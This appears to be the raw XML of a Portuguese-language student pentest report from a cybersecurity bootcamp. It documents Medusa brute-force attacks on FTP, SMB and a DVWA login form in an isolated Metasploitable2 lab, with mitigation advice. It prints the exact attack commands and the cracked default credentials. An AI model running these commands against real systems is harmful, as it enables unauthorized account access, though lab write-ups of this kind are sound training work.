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RELATÓRIO TÉCNICO DE PENTEST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E74C3C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Ataques de Força Bruta — FTP · SMB · DVWA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Bootcamp Riachuelo Cybersecurity — DIO  |  Março 2026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Analista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taissocout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05/03/2026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Alvo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Metasploitable2 — 192.168.56.101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Atacante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Parrot OS — 192.168.56.1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CONFIDENCIAL — LAB EDUCACIONAL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Sumário Executivo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192.168.56.101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Labs Executados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de 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Credenciais Encontradas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/ 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 Máxima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CRÍTICA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Relatório de execução de três ataques de força bruta contra o Metasploitable2, em ambiente de laboratório isolado (VirtualBox Host-Only), como entrega do Bootcamp Riachuelo Cybersecurity — DIO. Protocolos testados: FTP (porta 21), SMB (porta 445) e HTTP via DVWA (porta 80).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2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Credencial Descoberta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FTP / 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msfadmin:msfadmin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COMPROMETIDO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SMB / 445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msfadmin:msfadmin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ADMIN$ COMPROMETIDO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 DVWA / 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admin:msfadmin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COMPROMETIDO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Ambiente de Laboratório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Máquina Atacante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Parrot OS — VirtualBox — IP 192.168.56.1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Máquina Alvo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Metasploitable2 (Ubuntu 8.04) — IP 192.168.56.101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VirtualBox Host-Only (vboxnet0) — 192.168.56.0/24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Virtualizador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Oracle VirtualBox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05/03/2026 — 18:53 a 19:15 (horário de Brasília)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Confirmação de IP — Metasploitable2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Resultado do comando ifconfig executado diretamente no Metasploitable2, confirmando IP 192.168.56.101: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600075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1 — ifconfig no Metasploitable2: inet addr 192.168.56.101 confirmado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Lab 1 — FTP Brute Force (Porta 21)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FTP / Porta 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medusa -M ftp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msfadmin:msfadmin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COMPROMETIDO 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Verificação do Serviço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nmap -p 21 192.168.56.101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21/tcp open  ftp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Execução do Ataque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medusa -h 192.168.56.101 -U wordlists/usuarios.txt -P wordlists/senhas.txt -M ftp -v 6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Evidência — Credencial Encontrada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Linha crítica do output do Medusa confirmando sucesso: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ACCOUNT FOUND: [ftp] Host: 192.168.56.101 User: msfadmin Password: msfadmin [SUCCESS]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600075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2 — Medusa FTP: nmap (porta 21 aberta) + ACCOUNT FOUND msfadmin:msfadmin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Impacto e Vulnerabilidades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Credenciais trafegam em texto plano — capturáveis por sniffing de rede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Sem account lockout — brute force ilimitado sem bloqueio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Senha padrão msfadmin:msfadmin nunca alterada após instalação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vsftpd 2.3.4 — versão com backdoor conhecido (CVE-2011-2523)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Lab 2 — SMB Brute Force (Porta 445)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SMB / Porta 445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medusa -M smbnt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msfadmin:msfadmin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ADMIN$ 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Verificação do Serviço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nmap -p 445 192.168.56.101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445/tcp open  microsoft-ds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Execução do Ataque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medusa -h 192.168.56.101 -U wordlists/usuarios.txt -P wordlists/senhas.txt -M smbnt -v 6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Evidência — Acesso ADMIN$ e smbclient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Credencial SMB descoberta com acesso administrativo total, validada via smbclient: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ACCOUNT FOUND: [smbnt] Host: 192.168.56.101 User: msfadmin Password: msfadmin [SUCCESS (ADMIN$ - Access Allowed)]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600075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3 — smbclient listando compartilhamentos com ADMIN$ acessível (msfadmin:msfadmin)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print$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Disk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Printer Drivers — acessível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Disk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oh noes! — diretório temporário exposto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ADMIN$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IPC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Acesso administrativo total confirmado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msfadmin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Disk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Home Directory acessível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Lab 3 — DVWA HTTP Brute Force (Porta 80)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HTTP / Porta 80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Alvo Web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DVWA v1.0.7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admin:msfadmin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COMPROMETIDO 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DVWA — Security Level Low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DVWA acessível em http://192.168.56.101/dvwa — já incluso no Metasploitable2. Security Level configurado como Low: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600075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4 — DVWA Security Level: Low — proteções desabilitadas para o lab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Execução do Ataque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medusa -h 192.168.56.101 -u admin -P wordlists/senhas.txt -M http \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-m DIR:/dvwa/login.php -v 6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Evidência — Credencial Web Encontrada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/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ACCOUNT FOUND: [http] Host: 192.168.56.101 User: admin Password: msfadmin [SUCCESS]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6000750" cy="78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Figura 5 — Medusa HTTP: ACCOUNT FOUND admin:msfadmin no formulário DVWA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Sem CAPTCHA — sem distinção entre humano e bot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Sem rate limiting — requisições ilimitadas por segundo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Sem bloqueio de IP após tentativas excessivas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Análise de Risco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4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1 — FTP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FTP / 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9.8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CRÍTICO — texto plano + sem lockout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2 — SMB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SMB / 445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9.8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CRÍTICO — ADMIN$ comprometido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Lab 3 — HTTP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 / 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8.8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ALTO — acesso admin web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Vulnerabilidades Identificadas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Senhas Padrão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Credenciais de fábrica nunca alteradas em nenhum dos 3 serviços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Ausência de Lockout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Nenhum bloqueio de conta após tentativas falhas repetidas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FTP Legado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vsftpd 2.3.4 transmite em texto plano + backdoor CVE-2011-2523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SMBv1 Ativo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Vulnerável a EternalBlue (MS17-010) e variantes WannaCry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DVWA Sem WAF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Formulário web sem rate limiting, CAPTCHA ou proteção por IP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Recomendações de Mitigação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00"/>
        <w:gridCol w:w="19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Alterar todas as senhas padrão — mín. 16 chars + complexidade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Account Lockout após 5 tentativas falhas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🟠 ALTO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Desabilitar FTP — migrar para SFTP/SCP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🟠 ALTO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Desabilitar SMBv1 — previne EternalBlue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🟠 ALTO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MFA em todos os acessos administrativos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CAPTCHA + rate limiting em formulários web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SIEM com alertas de brute force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Conclusão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Os três laboratórios demonstraram como senhas padrão + ausência de lockout criam vetores críticos em FTP, SMB e HTTP. O Medusa encontrou credenciais válidas em todos os cenários, alguns em menos de 1 segundo.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Políticas rigorosas de gerenciamento e rotação de senhas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Account lockout e rate limiting como controles básicos obrigatórios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Desativação de protocolos legados (FTP, SMBv1)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Monitoramento contínuo com alertas SIEM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="27AE60" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="EAF7EF" w:val="clear"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1E8449"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Todos os labs concluídos com sucesso em ambiente isolado. Entrega do Bootcamp Riachuelo Cybersecurity — DIO.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4C3C" w:sz="4" w:space="1"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Bootcamp Riachuelo Cybersecurity — DIO | 05/03/2026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4C3C" w:sz="4" w:space="1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RELATÓRIO DE PENTEST — FTP · SMB · DVWA</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">    |    taissocout    | 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9d17e752b04016abdcd3ed98eaf662fd59531389.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/5ef0105bfce0f8d22446a1ca342e7703c602f2cc.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/b5c5a73ad83683a25a40482256f4ab28c5900f22.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6d8dbccce01e6ee815a6f7cbf00891b20f0cf456.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/35cce82c27de6d2dc7a57fcdf92962bbc800b897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2026-03-05T22:20:29.888Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-05T22:20:29.888Z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